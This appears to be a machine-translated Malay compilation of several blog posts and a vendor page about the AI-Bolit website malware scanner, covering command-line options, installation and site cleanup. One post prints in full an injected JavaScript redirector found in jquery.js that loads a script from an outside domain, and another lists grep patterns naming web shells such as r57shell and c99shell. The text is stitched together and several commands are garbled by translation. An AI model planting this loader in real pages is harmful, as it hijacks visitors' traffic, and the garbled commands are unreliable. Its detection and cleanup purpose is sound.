virus Aibolit. Bagaimana untuk bekerja dengan pengimbas AI-BOLIT dari baris arahan. Prinsip operasi dan ciri AI Bolit

Fungsi terbaik tersedia apabila menjalankan pengimbas AI-BOLIT dalam mod baris arahan. Ini boleh dilakukan di bawah Windows/Unix/Mac OS X, dan terus pada pengehosan, jika anda mempunyai akses melalui SSH dan pengehosan tidak mengehadkan sumber pemproses yang digunakan.

Sila ambil perhatian bahawa untuk menjalankan pengimbas, versi konsol PHP 7.1 dan lebih tinggi diperlukan. Versi terdahulu tidak disokong secara rasmi. Semak versi semasa dengan php -v

Bantu dengan parameter baris arahan pengimbas AI-BOLIT

Tunjukkan bantuan

php ai-bolit.php --help

php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

Imbas sambungan tertentu sahaja

php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,suspected,tpl

Sediakan fail kuarantin untuk dihantar kepada pakar keselamatan. Arkib AI-QUARANTINE-XXXX.zip dengan kata laluan akan dibuat.

php ai-bolit.php --kuarantin

Jalankan pengimbas dalam mod "paranoid" (disyorkan untuk mendapatkan laporan yang paling terperinci)

php ai-bolit.php --mode=2

php ai-bolit.php --mode=1

Semak satu fail "pms.db" untuk kod berniat jahat

php ai-bolit.php -jpms.db

Jalankan pengimbas dengan saiz memori 512Mb

php ai-bolit.php --memory=512M

Tetapkan saiz fail imbasan maksimum kepada 900Kb

php ai-bolit.php --saiz=900K

Jeda 500ms antara fail semasa mengimbas (untuk mengurangkan beban)

php ai-bolit.php --delay=500

Hantar laporan imbasan melalui e-mel [e-mel dilindungi]

php ai-bolit.php [e-mel dilindungi]

Buat laporan dalam fail /home/scanned/report_site1.html

php ai-bolit.php --report=/home/scanned/report_site1.html

Imbas direktori /home/s/site1/public_html/ (laporan lalai akan dibuat di sana jika pilihan --report=report_file tidak ditentukan)

php ai-bolit.php --path=/home/s/site1/public_html/

Jalankan arahan apabila pengimbasan selesai.

php ai-bolit.php --cmd="~/postprocess.sh"

Dapatkan laporan dalam teks biasa dengan nama site1.txt

php ai-bolit.php -lsite1.txt

Anda boleh menggabungkan panggilan, contohnya,

php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,disyaki

Dengan menggabungkan panggilan pengimbas AI-BOLIT dengan arahan Unix yang lain, anda boleh melaksanakan, sebagai contoh, imbasan kelompok tapak. Di bawah ialah contoh menyemak beberapa tapak yang dihoskan dalam akaun. Sebagai contoh, jika tapak terletak di dalam direktori /var/www/user1/data/www, maka arahan untuk melancarkan pengimbas akan

cari /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path=() --mode=2 \;

Dengan menambahkan parameter --report, anda boleh mengawal direktori di mana laporan imbasan akan dijana.

php ai-bolit.php senarai parameter... --eng

Tukar antara muka laporan kepada bahasa Inggeris. Parameter ini sepatutnya datang yang terakhir.

Integrasi dengan perkhidmatan lain dan ke dalam panel pengehosan

php ai-bolit.php --json_report=/path/file.json

Hasilkan laporan dalam format json

php ai-bolit.php --progress=/path/progress.json

Simpan status pengesahan ke fail dalam format json. Fail ini akan mengandungi data berstruktur dalam format json: fail imbasan semasa, berapa banyak fail yang telah diimbas, berapa banyak fail yang tinggal untuk diimbas, peratusan imbasan, masa sehingga imbasan selesai. Mekanisme ini boleh digunakan untuk menunjukkan bar kemajuan dan data tentang fail yang diimbas dalam panel. Setelah imbasan selesai, fail dipadamkan secara automatik.

php ai-bolit.php --handler=/path/hander.php

Pengendali acara luaran. Anda boleh menambah pengendali ralat permulaan/tamat/imbasan/imbasan anda sendiri. Contoh fail boleh dilihat dalam arkib pengimbas, dalam direktori tools/handler.php. Sebagai contoh, selepas pengimbasan selesai, anda boleh melakukan sesuatu dengan fail laporan (hantar melalui mel, arkib, dsb.).

Baru-baru ini, pada salah satu projek saya, saya mendapati ubah hala kepada sumber pengiklanan pihak ketiga telah dicetuskan. Ini bukan penggodaman tapak yang jelas apabila ia berhenti berfungsi sepenuhnya, tetapi cara tersembunyi untuk mencuri lalu lintas. Sebagai contoh, penyerang boleh mengubah hala hanya pengguna daripada peranti mudah alih atau membuat skrip mencetuskan secara tidak konsisten supaya pemilik projek tidak menyedari kehilangan penonton. Walau apa pun, ini semua tidak begitu baik untuk tapak anda, baik dari sudut pandangan pelawat yang tidak sampai ke halaman yang betul, dan boleh menyebabkan masalah dari enjin carian jika tiba-tiba ubah hala pergi ke sumber dengan virus .

Hari ini kita akan melihat satu skrip PHP yang berguna, AI Bolit, yang membolehkan anda mencari virus pada pengehosan anda untuk menyingkirkan pelbagai kod hasad. Penyelesaiannya adalah percuma dan tidak sukar untuk digunakan.

Skrip ini mempunyai 3 pilihan keluaran:

  • AI Bolit untuk Windows - membolehkan anda menganalisis tapak web secara setempat, selepas memuat turunnya ke komputer anda.
  • Pilihan klasik untuk menyemak pengehosan untuk virus (juga sesuai untuk Unix dan Mac OS X).
  • Pengimbas web baharu (ReScan.pro) - menyemak halaman tapak web dalam talian.

Pilihan terakhir, seperti yang anda faham, adalah yang paling mudah; namun, ia tidak melihat secara langsung pada fail yang terdapat pada pengehosan, tetapi hanya mengimbas secara terpilih beberapa halaman web. Semakan cetek sedemikian tidak dapat memberitahu anda sumber khusus masalah di tapak, tetapi ia akan membantu anda mengesannya.

Sesetengah pengguna mendapati skrip AI Bolit untuk Windows adalah versi yang paling biasa dan mudah, kerana... ramai orang bekerja dengan OS ini. Walau bagaimanapun, saya masih mengesyorkan menjalankan imbasan virus pada pengehosan anda. Tidak ada yang rumit di sini, dan saya akan memberitahu semua orang mengenainya dengan lebih terperinci di bawah.

Prinsip operasi dan ciri AI Bolit

Untuk menggunakan AI Bolit anda perlu mengikuti langkah berikut:

  • Muat turun skrip dari laman web program.
  • Buka bungkusan dan muat naik ke pengehosan anda.
  • Lancarkan AI Bolit seperti yang ditunjukkan dalam dokumentasi.
  • Selepas melengkapkan semakan, anda menerima hasil analisis tapak.
  • Kemudian anda boleh menyelesaikan masalah itu sendiri atau mendapatkan bantuan daripada pakar.

Perkara terakhir menerangkan mengapa skrip PHP AI Bolit yang hebat dan hebat itu diedarkan secara percuma. Saya berpendapat bahawa selepas menemui masalah dan virus pada pengehosan, ramai pengguna beralih kepada pembangun untuk mendapatkan perkhidmatan lanjut. Pendekatan yang agak logik. Penyelesaiannya, dengan cara ini, dipatenkan dan mempunyai algoritma yang unik, dan tapak pengehosan ru yang popular mengesyorkan/menggunakannya dalam kerja mereka. Saya masih ingat bahawa saya pernah meminta bantuan teknikal hoster berkenaan masalah dengan satu tapak web, dan mereka mula menyemak pengehosan untuk virus menggunakan AI Bolit. Selepas kejadian itu, saya mengetahui tentang kewujudan penyelesaian ini :)

Kelebihan dan ciri utama AI Bolit:

  • cari pelbagai jenis kod hasad: virus, cengkerang, pintu belakang, kelemahan awam dalam skrip;
  • pengedaran percuma;
  • penggunaan analisis heuristik berpaten khas;
  • pemasangan dan konfigurasi yang agak mudah;
  • pangkalan data semasa virus dan skrip berniat jahat;
  • menyemak pengehosan untuk virus untuk mana-mana tapak web dan CMS;
  • bekerja dengan sistem pengendalian yang berbeza: Windows, Unix, MacOS;
  • cadangan daripada syarikat pengehosan terkemuka.

Cara menggunakan AI Bolit

1. Skrip AI Bolit boleh dimuat turun dengan mengikuti pautan ini di laman web dengan penerangannya. Adalah disyorkan untuk memilih versi universal(!) untuk menyemak pengehosan anda untuk virus. Selepas ini, muat turun automatik fail ai-bolit.zip akan bermula.

2. Langkah seterusnya ialah membongkar dan memuat naik ke pengehosan. Untuk bekerja dengan FTP, saya menggunakan program percuma FileZilla (pelanggan FTP yang sangat baik). Selepas membuka zip ai-bolit.zip, anda akan menemui dokumentasi pemasangan di dalam fail readme.txt. Jika anda mahu, anda boleh membiasakan diri dengannya.

define ("LULUS" , "?????????????????????" );

define("LULUS", "?????????????????????");

Dan masukkan bukannya simbol??? maksudnya. Simpan fail.

4. Kemudian salin keseluruhan kandungan folder /ai-bolit/ ke pengehosan anda dalam direktori akar (contohnya, untuk WP di sinilah wp-config terletak).

5. Selepas memuat naik skrip ke pelayan, anda perlu melancarkan AI Bolit menggunakan pautan dalam bar alamat penyemak imbas anda:

https://your_site_address/ai-bolit.php?p=your_password

Selepas beberapa lama, anda akan menerima laporan imbasan virus pada pengehosan anda.

Dalam contoh ini, nampaknya semakan mengesan ubah hala yang mencurigakan untuk peranti mudah alih yang terletak di haccess, tetapi saya sendiri menambahkannya. Kod pihak ketiga juga ditemui dalam beberapa fail templat (ia tiada dalam tangkapan skrin, kerana saya sudah membersihkan semuanya).

6. Selepas pengimbas AI Bolit telah menyelesaikan kerjanya, anda mesti memadam semua failnya daripada FTP (yang anda muat turun dalam langkah 4) bersama-sama dengan laporan.

Akhir sekali, saya ingin ambil perhatian bahawa skrip mengandungi 2 mod pengesahan: ekspres dan "paranoid". Dalam kes pertama, hanya fail js, php, html dan htaccess disemak, dan yang kedua membolehkan anda menjalankan AI Bolit dengan potensi penuhnya. Untuk melakukan ini, dalam fail tetapan ai-bolit.php, tetapkan nilai pembolehubah 'scan_all_files' => 1 atau gunakan pautan dengan parameter tambahan untuk menjalankan skrip:

https://your_site_address/ai-bolit.php?p=your_password&full

Dokumentasi mengatakan bahawa sebelum memulakan semula anda perlu memadam AI-BOLIT-DOUBLECHECK.php, walaupun saya secara peribadi tidak mempunyai fail sedemikian pada FTP. Dalam readme.txt anda juga akan menemui maklumat tentang cara menyemak tapak web yang dihoskan untuk virus melalui SSH. Algoritma tindakan adalah serupa, tetapi selepas menyalin semua fail skrip ke FTP, jalankannya dengan arahan:

php ai-bolit.php

php ai-bolit.php

Akibatnya, fail akan dibuat secara automatik LAPORAN AI-BOLIT-<дата>-<время>.html dengan keputusan ujian. Pada dasarnya, tidak ada yang rumit, tetapi anda boleh melihat FAQ untuk jawapan tambahan kepada soalan.

Secara umum, saya dapat menyemak tapak untuk virus dengan AI Bolit dengan agak mudah - Saya menemui masalah dan membetulkannya dalam masa kira-kira 10. Muat turun pengimbas secara percuma dari sini, maka anda perlu mengkonfigurasi dan melancarkan AI Bolit menggunakan alat khas pautan dalam penyemak imbas, dan kemudian lihat hasilnya. Cara membetulkan virus, pintu belakang dan cengkerang adalah soalan yang sedikit berbeza. Dalam kes paling mudah (seperti saya dengan ubah hala), anda hanya mengalih keluar kod hasad daripada fail. Jika anda tidak memahami perkara ini dengan baik atau tugasnya terlalu rumit, anda boleh meminta perundingan/perkhidmatan berbayar daripada pembangun skrip. Mereka akan membantu bukan sahaja dengan penyingkiran virus pada pengehosan anda, tetapi juga meningkatkan perlindungannya.

Saya sedang mencari di Internet untuk tema "berbayar" percuma untuk tapak tersebut. Nasib baik, terdapat cukup laman web sedemikian. Benar, mereka menyalin satu sama lain =) Dari pengalaman dengan templat sedemikian, saya tahu bahawa kadang-kadang anda perlu membayar sepenuhnya untuk hadiah percuma tersebut. Kerana orang yang sangat jahat memasukkan semua jenis perkara jahat ke dalam templat sedemikian yang boleh menyebabkan masalah yang sangat besar untuk pengaturcara yang baik. Saya masih ingat bahawa antivirus ESET saya pernah mencari dan bersumpah di base64. Sekarang dia tidak bersumpah juga. Apa yang saya maksudkan ialah jika anda menyemak dengan antivirus, ia tidak akan membantu.

Sebelum Ai-Bolit, saya menyemak fail Total Commander untuk kandungan perkataan tertentu dan, bergantung pada apa yang ditemui, saya menyemak dan membetulkannya. Tetapi ini adalah tugas yang sangat membosankan. Dan saya mula mencari carian yang lebih optimum dan lebih pantas penyelesaian. Dan saya mendapatinya. Ini adalah - AI-Bolit ialah skrip percuma yang unik untuk mencari virus, Trojan, pintu belakang dan aktiviti penggodam pada pengehosan.

Jadi, perkara yang boleh dilakukan oleh skrip ini:

  • cari virus, semua jenis skrip berniat jahat dan penggodam pada pengehosan: cangkerang berdasarkan tandatangan, cangkerang berdasarkan heuristik mudah - segala-galanya yang tidak dapat ditemui oleh antivirus biasa.
  • bekerja dengan semua cm yang paling popular tanpa pengecualian, termasuk joomla, wordpress, drupal, bitrix...
  • cari ubah hala dalam .htaccess ke tapak berniat jahat
  • cari kod sape/trustlink/linkfeed dalam fail .php
  • tentukan pintu
  • tunjukkan direktori dibuka untuk menulis
  • cari pautan yang tidak kelihatan dalam templat

Mengapa skrip ini diperlukan?

Penggodam yang berpengalaman boleh menggodam hampir mana-mana tapak web. Dan laman web anda mungkin tidak terkecuali. Apakah bahaya penggodaman laman web? Selepas mendapat akses ke tapak, penyerang boleh melakukan perkara berikut:

  • "mengalirkan" trafik anda ke projek anda
  • memuat turun kandungan pelayan dan pangkalan data untuk dijual kepada pihak ketiga
  • akan menggantikan maklumat hubungan atau pembayaran di tapak
  • memuat turun data peribadi pengguna
  • akan meletakkan pintu dengan pautan spam di tapak web anda
  • akan memperkenalkan virus, Trojan atau eksploitasi ke halaman laman web, menjangkiti pelawat
  • menghantar spam daripada pelayan anda
  • akan menjual akses ke tapak yang digodam kepada penyerang lain untuk penembusan tanpa kebenaran berikutnya
  • dan seterusnya... Sedih. ya?

Ai-Bolit membolehkan anda mengesan banyak perisian hasad dan perubahan yang mencurigakan tepat pada masanya pada pengehosan anda, mengurangkan risiko disekat oleh enjin carian kerana menyebarkan virus dan mempunyai pintu masuk. Ia juga membolehkan anda mengetahui dengan segera tentang kemungkinan kebocoran maklumat dan masalah lain mengenai tapak anda. SEJUK!!!

Cara menggunakan skrip

Arkib skrip mengandungi arahan yang SANGAT jelas. Secara lalai, "doktor" mengimbas dalam mod biasa dengan bilangan minimum tandatangan dan bilangan minimum positif palsu.

Terdapat dua pilihan pengesahan. Kedua-duanya diterangkan dalam arahan. Saya hanya akan memberikan yang pertama - yang dipermudahkan.

Pilihan pelancaran daripada penyemak imbas (tidak disyorkan kerana ia hanya melakukan pengimbasan ekspres)

  • Muat turun arkib dengan skrip (lihat fail yang dilampirkan)
  • Unpack.zip
  • Tukar kata laluan dalam baris tentukan("LULUS", "letakkan_mana-mana_kata laluan_kuat_di sini_8_symbols_min");
  • Dayakan mod "pakar" dalam baris define("AI_EXPERT", 0); // gantikan 0 dengan 1
  • salin fail dari folder /ai-bolit/ ke pelayan dalam direktori akar
  • salin fail dari folder know_files yang sepadan dengan cms anda
  • buka http://sitename.com/ai-bolit.php?p=My456Pass123 dalam penyemak imbas anda dan tunggu laporan
  • !!!selepas memaparkan laporan, padamkan fail daripada Aibolit dan skrip itu sendiri daripada tapak!!!

Itu sahaja. Kemudian, laporan akan muncul di hadapan anda dan anda hanya perlu mengikuti ralat dan memperbaiki kelemahan.

Maklum balas

Penulis adalah seorang yang sangat peramah. Sentiasa menjawab. Jika anda mempunyai sebarang cadangan atau soalan, sila tulis kepada:
web: http://www.revisium.com/ai/
e-mel: [e-mel dilindungi]
skype: greg_zemskov

Hari ini mereka meminta saya untuk membantu membersihkan kedai dalam talian daripada virus. Tanpa diduga, salah seorang pekerja menerima penolakan untuk pengiklanan Google Adwords. Surat itu menunjukkan bahawa dalam fail jquery.js Kod yang mencurigakan telah dimasukkan.

Pertama sekali, saya membuka laluan ke fail ini menggunakan penyemak imbas, tetapi antivirus Avast tidak bertindak balas terhadap fail ini dalam apa cara sekalipun, walaupun secara visual saya sudah melihat kod berniat jahat itu. Saya kemudian menyambung melalui ftp menggunakan FileZilla dan cuba membuka fail menggunakan Notepad++. Dan di sini antivirus saya menyekat akses kepada fail ini.

Untuk membersihkan fail js daripada virus, saya terpaksa melumpuhkan AVAST selama 10 minit dan kemudian mengalih keluar baris berniat jahat daripada fail.

Jika anda menghadapi masalah yang sama, alih keluar kod berikut seperti yang ditunjukkan dalam gambar atau baris ini.

Var r=document.referrer; var c=document.cookie; r1=0; jika ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf(" mail")>0)) ( document.cookie = "__ga1=1; expires=Rabu, 1 Mac 2020 00:00:00; path=/;"; r1=1; ) lain (jika (c.indexOf(" __ga1")==-1)(document.cookie = "__ga2=1; tamat tempoh=Rabu, 1 Mac 2020 00:00:00; laluan=/;";)) jika (((c.indexOf("__ga1") )>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) (document.write(unescape("%3Cscript src="http://google-analyzing .com/urchin.js" type="text/javascript"%3E%3C/script%3E"));

Sandaran tapak.

Seterusnya, kami menyambung melalui akses ssh, contohnya, menggunakan utiliti dempul dan, jika boleh, buat arkib tapak. Untuk melakukan ini, hanya gunakan arahan berikut dalam konsol:

tar - cf backup .tar /home/login/site/public_html


*/home/login/site/public_html - laluan penuh ke direktori utama tapak

Anda tidak perlu membuat sandaran tapak, tetapi sejauh manakah ia akan memadamkan sesuatu yang penting?

Kini terdapat dua pilihan untuk menyemak tapak web untuk mengesan virus

1. Menyemak tapak menggunakan skrip php Ai-Bolit, yang mencari pelbagai virus dan juga shell php.

2. Muat turun keseluruhan tapak ke komputer anda dan jalankannya dengan antivirus Avast, tetapi pilihan pertama adalah lebih baik, lebih mudah dan kualiti yang lebih tinggi.

Membersihkan tapak pada komputer tempatan anda

Saya mula-mula menggunakan kaedah kedua, jadi saya akan menerangkan kaedah itu. Selepas semua fail (atau arkib) dimuat turun ke komputer, dan terdapat beberapa 25,000 daripadanya, saya membuka Avast dan menentukan folder dengan fail tapak untuk mengimbasnya untuk skrip berniat jahat.

Selepas Avast melakukan imbasan, dua virus skrip telah dikesan dalam folder fail tapak web:

  • Php-Shell-Jv
  • Js-Redirector-Fc

Fail index.php terdiri daripada kod berikut:

Fail javascript "ui.datepicker_old.js" mempunyai kod hasad di bahagian paling bawah kandungan skrip. Kod ini mesti dialih keluar!

Membersihkan tapak web daripada virus menggunakan Ai-Bolit.

Kaedah Ftp.

1. Muat turun arkib dengan skrip Aibolit ke komputer tempatan anda dan buka bungkusannya.

2. Sambung melalui ftp menggunakan klien FileZilla

3. Letakkan fail arkib yang tidak dibungkus dalam direktori utama tapak /home/your site/public_html

4. Jalankan skrip http://your domain/ai-bolit.php

5. Fail laporan akan dibuat dalam direktori utama dengan nama AI-BOLIT-REPORT.html

Jika selepas menjalankan skrip skrin putih kosong dipaparkan, maka versi php pada pelayan pengehosan tidak sesuai untuk Aibolit.

Perhatian! Jika anda perlu menyemak semua tapak dalam direktori, muat naik skrip ke folder /home/domains/ atau /home/, maka Ai-Bolit akan secara rekursif melalui semua folder dan mengeluarkan laporan, tetapi nampaknya saya adalah lebih baik untuk menyemak satu domain pada satu masa.

Pilihan konsol (SSH)

1. Lancarkan program Putty, atau program konsol lain.

2. Sambung ke pelayan menggunakan hos dan kata laluan.

3. Pergi ke direktori utama tapak dengan arahan cd /home/log masuk anda/laman web anda/public_html/

4. Muatkan skrip dengan arahan wget http://www..zip

5. Buka pek arkib zip dengan arahan nyahzip 20160904_112415ai-bolit.zip

6. Jalankan skrip php ai-bolit.php

Untuk berjalan di latar belakang gunakan arahan: skrin -d -m php ai-bolit.php

7. Kami sedang menunggu skrip untuk melakukan semakan dan membuat laporan seperti " AI-BOLIT-REPORT.html" pada pelayan.

Sila ambil perhatian juga bahawa jika php dipasang pada pelayan anda di bawah 5.3, Aibolit akan menunjukkan ralat dan tidak akan mula mengimbas. Dalam kes saya, saya terpaksa memuat turun tapak dan menyemaknya pada pelayan saya.

Selepas fail laporan dibuat pada pelayan, anda boleh memuat turunnya ke komputer anda dan melihatnya dengan penyemak imbas biasa (Chrome, Firefox, dll.).

Pertama sekali, anda harus memberi perhatian kepada laporan mengenai "Skrip berniat jahat", dan kemudian sama ada memadam fail ini dengan teliti atau membersihkannya secara manual, seperti yang saya lakukan.

ialah pengimbas virus dan perisian hasad generasi baharu yang telah digunakan oleh puluhan ribu juruweb dan pentadbir pelayan.

Ia mencari virus, skrip penggodam, halaman pancingan data, pintu masuk dan jenis skrip hasad lain yang dimuat turun oleh penggodam apabila tapak web digodam.

Jika tapak anda menghadapi masalah, contohnya:

  • antivirus menyekat akses ke halaman laman web,
  • pautan orang lain muncul pada halaman
  • ubah hala mudah alih berlaku apabila log masuk dari telefon pintar atau tablet,
  • kehadiran menurun secara mendadak
  • pelawat mengadu tentang virus,
  • mengehos mel disekat untuk menghantar spam,
  • terdapat kecurigaan bahawa laman web tersebut telah digodam
semak tapak dengan pengimbas AI-Bolit. Ia akan membantu anda mencari fail yang mengandungi pintu belakang penggodam atau cangkang web, kod jualan pautan atau mel spam.

Pengimbas AI-Bolit adalah percuma untuk kegunaan bukan komersial; mana-mana juruweb boleh memuat naik pengimbas ke tapak dan menyemak sumber mereka untuk virus dan penggodaman.

AI-Bolit disyorkan oleh banyak penyedia pengehosan Rusia, sebahagian daripada mereka telah membina pengimbas ke dalam panel kawalan pengehosan maya, yang membolehkan pemilik akaun melakukan imbasan anti-virus dalam satu klik.

Pengimbas telah dibangunkan oleh pakar keselamatan maklumat di syarikat Revision, yang pakar dalam pembasmian kuman laman web dan perlindungan penggodaman.

Setiap hari, apabila merawat dan memulihkan tapak web, pakar Revizium menemui skrip hasad baharu dan cara yang lebih canggih untuk menyembunyikan kod hasad. Maklumat ini digunakan untuk melaraskan algoritma pengimbas dan menambah asas peraturan, yang menjadikan pengimbas AI-Bolit lebih berkesan dengan setiap versi baharu.

Apakah keunikan pengimbas AI-Bolit?

Kelemahan pengimbas perisian hasad berasaskan pelayan moden ialah pendekatan mereka untuk mengesan perisian hasad dan pangkalan anti-virus mereka. Antivirus pelayan mencari virus dan kod penggodam menggunakan parameter tetap (jumlah semak fail, cincang, serpihan rentetan). Pada masa yang sama, pembangun skrip berniat jahat moden telah belajar untuk menipu pengimbas menggunakan penyulitan kod, menjadikan setiap salinan baharu berbeza daripada yang sebelumnya: mereka menggunakan pengeliruan berubah-ubah, penyulitan kod boleh laku, panggilan tidak langsung dan pendekatan lain. Oleh itu, kaedah lama mencari virus tidak lagi berfungsi. Jika sebelum ini pentadbir sistem hanya perlu melaksanakan arahan

Cari -type f -name "*.php" -print0 | xargs -0 fgrep -l "base64_decode($_POST" cari -type f -name "*.php" -print0 | xargs -0 fgrep -l "if (count ($_POST))< 2) { die(PHP_OS.chr(" find -type f -size -1000c -name "*.php" -print0 | xargs -0 grep -il "if(isset(\$_REQUEST\[.*eval(.*)" find -type f -name "*.php" -print0 | xargs -0 fgrep -l "base64_decode($_REQUEST" find -type f -size -1000c -name "*.php" -print0 | xargs -0 fgrep -l "eval(stripslashes($_REQUEST" find ~/domains/ -type f -name "*.php" -print0 | xargs -0 fgrep -l "eval($___($__)" find \(-regex ".*\.php$" -o -regex ".*\.cgi$" \) -print0 | xargs -0 egrep -il "r0nin|m0rtix|r57shell|c99shell|phpshell|void\.ru|phpremoteview|directmail|bash_history|filesman" find -type f -name "*.php" -print0 | xargs -0 fgrep -l "Euc

Untuk mencari semua cangkang penggodam, kini ini tidak lagi mencukupi, kerana cangkang web penggodam kelihatan seperti ini:

Dan ia mengubah struktur dan perwakilan rentetannya.

Kami memerlukan mekanisme yang lebih cekap untuk mencari kod berniat jahat. Oleh itu, AI-Bolit mengambil pendekatan yang sedikit berbeza.

Apabila mencari kod hasad, pengimbas menggunakan normalisasi awal kod sumber, enjin carian ungkapan biasa dan peraturan heuristik. Semua ini bersama-sama memungkinkan untuk mengesan pengubahsuaian dikodkan bagi cangkerang web dan pintu belakang, serta virus dan skrip penggodam baharu yang masih tidak diketahui, mengenal pastinya melalui parameter alternatif (contohnya, jika kod sumber menggunakan panggilan biasa untuk skrip penggodam, fail mempunyai nama yang dijana secara rawak , oleh atribut fail bukan standard, dsb.). Penggunaan algoritma pengesanan perisian hasad lanjutan membolehkan pengimbas AI-Bolit mencari serpihan yang disulitkan bersifat polimorfik. Sebagai contoh, ini:

Hasil daripada eksperimen, AI-Bolit menunjukkan pengesanan skrip penggodam yang jauh lebih tinggi daripada ClamAv dan MalDet, yang digunakan pada banyak tapak pengehosan sebagai penyelesaian anti-virus percuma.

Cara pengimbas AI-Bolit berfungsi

Untuk menyemak tapak, cuma muat turun pengimbas ke direktori tapak (pada pengehosan atau pada komputer tempatan dengan sandaran tapak) dan jalankannya. Pengimbas boleh dibuka dalam pelayar atau dilancarkan dalam mod baris arahan melalui SSH. Selain itu, AI-Bolit boleh menyemak salinan sandaran tapak secara setempat pada komputer anda.

Hasil audit tapak ialah laporan terperinci dalam format html atau teks, yang boleh dihantar secara automatik melalui e-mel.

Tapak ini mempunyai arahan video terperinci dan panduan untuk pemula.

Adakah anda pasti tapak anda tidak digodam?

Kebanyakan pemilik tapak web tidak menyedari bahawa tapak web mereka telah digodam dan mempunyai skrip penggodam dimuatkan pada mereka. Oleh itu, kami mengesyorkan anda menyemak tapak anda dengan pengimbas AI-Bolit sekarang. Jika anda mempunyai sebarang soalan tentang laporan pengimbas, hantarkannya kepada kami di "Semakan" di [e-mel dilindungi](dalam bentuk arkib .zip), kami akan membantu anda memahaminya.

Kemas kini pengimbas diumumkan di Twitter kami



ARTIKEL BERKAITAN